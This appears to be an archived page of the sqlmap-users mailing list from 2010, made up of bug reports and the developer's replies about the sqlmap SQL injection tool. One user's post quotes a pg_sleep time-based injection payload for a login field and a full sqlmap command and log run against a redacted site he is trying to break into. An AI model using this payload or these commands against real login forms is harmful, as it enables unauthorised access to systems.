<body><h1>Object Moved</h1>This object may be found <a HREF="censored for privacy">here</a>.</body> Connection closed by foreign host. Using latest SQLMap SVN -- Btw, good work on the MS Access support!@! -James @ Ev6.NET |
From: David G. <sk...@gm...> - 2010-04-05 20:38:45
|
I have one site in Java which is only vulnerable to this type of technique (time-based blind sql inj), where all others simply do not work. Theoretically speaking, I have a login form that receives 2 parameters from the user via the POST method, which is the login and password. I've tried several ways to circumvent this form to gain unauthorized access, but i not get success in the handling of sql injection. However, nessus reported that the field is vulnerable to Time-Based Sql Injection by manipulating the parameter j_username with the following query: j_username = ';%20select%20pg_sleep%20(10)-- Tested the failure, I noticed that you can only make a time-based blind sql injection. But even passing the parameter --time-test for the sqlmap, and setting the option in sqlmap.conf timetest to true, does not make sqlmap test time-based sql inj. # ./sqlmap.py -u "http:/xxxx/xxxx/j_xx_xxx" --data "action=Login&j_password=&j_username=" -p j_username -v 2 --time-test --time-sec 4 --dbms postgresql sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 17:34:40 [17:34:40] [DEBUG] initializing the configuration [17:34:40] [DEBUG] initializing the knowledge base [17:34:40] [DEBUG] cleaning up configuration parameters [17:34:40] [DEBUG] setting the HTTP timeout [17:34:40] [DEBUG] setting the HTTP method to GET [17:34:40] [DEBUG] creating HTTP requests opener object [17:34:40] [DEBUG] forcing back-end DBMS to user defined value [17:34:40] [DEBUG] parsing XML queries file [17:34:40] [INFO] using '/home/skys/sqlmap-dev/output/xxx/session' as session file [17:34:40] [INFO] testing connection to the target url sqlmap got a 302 redirect to http://xxx/xxx/index.html;jsessionid=8EF344E0CF2864CF8DCDF23F730E0F57 - What target address do you want to use from now on? http://xxx:80/xxx/j_xxx_xxx(default) or provide another target address based also on the redirection got from the application > [17:34:41] [WARNING] the testable parameter 'j_username' you provided is not into the Cookie [17:34:41] [INFO] testing if the url is stable, wait a few seconds [17:34:42] [INFO] url is stable [17:34:42] [INFO] testing sql injection on POST parameter 'j_username' with 0 parenthesis [17:34:42] [INFO] testing unescaped numeric injection on POST parameter 'j_username' [17:34:42] [INFO] POST parameter 'j_username' is not unescaped numeric injectable [17:34:42] [INFO] testing single quoted string injection on POST parameter 'j_username' [17:34:42] [INFO] POST parameter 'j_username' is not single quoted string injectable [17:34:42] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username' [17:34:42] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable [17:34:42] [INFO] testing double quoted string injection on POST parameter 'j_username' [17:34:42] [INFO] POST parameter 'j_username' is not double quoted string injectable [17:34:42] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable [17:34:43] [INFO] POST parameter 'j_username' is not injectable with 0 parenthesis [17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 1 parenthesis [17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable [17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable [17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable [17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable [17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable [17:34:43] [INFO] POST parameter 'j_username' is not injectable with 1 parenthesis [17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 2 parenthesis [17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable [17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable [17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable [17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable [17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable [17:34:43] [INFO] POST parameter 'j_username' is not injectable with 2 parenthesis [17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 3 parenthesis [17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable [17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable [17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable [17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable [17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username' [17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable [17:34:43] [INFO] POST parameter 'j_username' is not injectable with 3 parenthesis [17:34:43] [WARNING] POST parameter 'j_username' is not injectable [17:34:43] [ERROR] all parameters are not injectable [*] shutting down at: 17:34:43 # svn info Path: . URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap Repository Root: https://svn.sqlmap.org/sqlmap Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb Revision: 1536 Node Kind: directory Schedule: normal Last Changed Author: stamparm Last Changed Rev: 1536 Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010) -- David Gomes Guimarães |
From: David G. <sk...@gm...> - 2010-04-05 19:53:29
|
The problem happens with any dbms i pass. Oracle, MySQL, Postgre,etc.. # ./sqlmap.py -u "http://xxx" --data "xxx" -p xxx -v 2 --time-test --dbms oracle sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 16:49:25 [16:49:25] [DEBUG] initializing the configuration [16:49:25] [DEBUG] initializing the knowledge base [16:49:25] [DEBUG] cleaning up configuration parameters [16:49:25] [DEBUG] setting the HTTP timeout [16:49:25] [DEBUG] setting the HTTP method to GET [16:49:25] [DEBUG] creating HTTP requests opener object [16:49:25] [DEBUG] forcing back-end DBMS to user defined value [16:49:25] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.9-dev Python version: 2.5.2 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 77, in main init(cmdLineOptions) File "/home/skys/sqlmap-dev/lib/core/option.py", line 1074, in init __setDBMS() File "/home/skys/sqlmap-dev/lib/core/option.py", line 503, in __setDBMS "|".join([alias for alias in FIREBIRD_ALIASES])) TypeError: not all arguments converted during string formatting [*] shutting down at: 16:49:25 # svn info Path: . URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap Repository Root: https://svn.sqlmap.org/sqlmap Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb Revision: 1536 Node Kind: directory Schedule: normal Last Changed Author: stamparm Last Changed Rev: 1536 Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010) -- David Gomes Guimarães |
From: Miroslav S. <mir...@gm...> - 2010-04-05 11:33:55
|
Fixed and commited On Fri, Apr 2, 2010 at 6:16 PM, Ole Rasmussen <ol...@gm...> wrote: > I believe there's a bug when executing the following via sql-shell: > "SELECT REPLACE('something', 's', 'b')" > The result is: > [INFO] the SQL query provided has more than a field. sqlmap will now > unpack it into distinct queries to be able to retrieve the output even if we are > going blind > > and then it returns nothing. This is clearly incorrect - looks like > SqlMap thinks it's a list of fields. > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Miroslav S. <mir...@gm...> - 2010-04-04 14:40:04
|
Hi Kasper. Thank you for spotting and reporting the bug. Now it should be fixed and commited. Kind regards, Miroslav Stampar On Sun, Apr 4, 2010 at 10:11 AM, Kasper Føns <th...@ma...> wrote: > Hello Sqlmap. > > It seems that when using sqlmap with the -g option, sqlmap wants to > collect cookie parameters. > The problem is that when switching from one target to another, any > previous cookie parameters are still kept - thought invalid for the new > target. > > /Kasper > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Kasper F. <th...@ma...> - 2010-04-04 08:11:45
|
Hello Sqlmap. It seems that when using sqlmap with the -g option, sqlmap wants to collect cookie parameters. The problem is that when switching from one target to another, any previous cookie parameters are still kept - thought invalid for the new target. /Kasper |
From: Ole R. <ol...@gm...> - 2010-04-02 16:16:47
|
I believe there's a bug when executing the following via sql-shell: "SELECT REPLACE('something', 's', 'b')" The result is: [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind and then it returns nothing. This is clearly incorrect - looks like SqlMap thinks it's a list of fields. |